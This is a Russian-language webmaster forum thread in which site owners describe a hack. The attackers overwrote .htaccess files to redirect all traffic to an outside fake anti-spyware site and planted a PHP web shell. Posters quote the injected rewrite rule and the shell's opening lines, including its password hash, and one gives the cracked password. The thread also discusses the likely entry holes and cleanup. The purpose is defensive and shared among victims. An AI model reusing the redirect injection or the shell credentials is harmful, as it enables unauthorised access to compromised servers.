Новая тема   Ответить

 weely6
На сервере в корне всех сайтов появился .htaccess там где его небыло, где был его переписали новым

RewriteEngine On
RewriteBase /
RewriteRule ^(.? http://ORALEK.COM/r.php

все запросы редиректяться на антиспайварь, о результатах расследования отпишу

 FriMan
было тоже самое 1 августа
поменяли .htaccess и залили шелл с названием файла confg.php

файл начинается со строк

<?php # Web Shell by oRb
$auth_pass = "70b84434a4b0ee2fa95f928f4d6310cd";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = false;
$default_charset = 'Windows-1251';

сделай поиск по серверу может его тоже найдешь

 FriMan
ps. пасс 70b84434a4b0ee2fa95f928f4d6310cd это krevedko

 Artist®
почему бы не написать где ваши сервера расположены ?

 4dm
Какую дыру использовали известно? Кто хостер?

 basta
Toxa, FriMan
какую связку скриптов используете в сиджах?

 FriMan
хостинг supphosting
у меня был взломан только один сайт, на нем были файлы от старого Comust Thumbs, думаю через него, уже снес ессно его

 weely6
у меня ломанули через дыру в phpMyAdmin хостер проапгрейдил всё, оперативно провёл расследование

з,Ы fedora-hosting, скрипты были стрим+ат3 и самописный с at3, на ат3 везде стояла защита по ИП

Последний раз редактировалось: weely6 (10/08/10 в 02:01), всего редактировалось 1 раз

 weely6
за вебшел спасибо

действительно лежит в одном домене это гавно

 weely6
после того как удалил все htaccess и отписал хостеру, пришёл ответ что дыра устранена, но файлы на сервере появились снова, потом почитал тему удалил вебшелл надеюсь что это окончательно решит проблему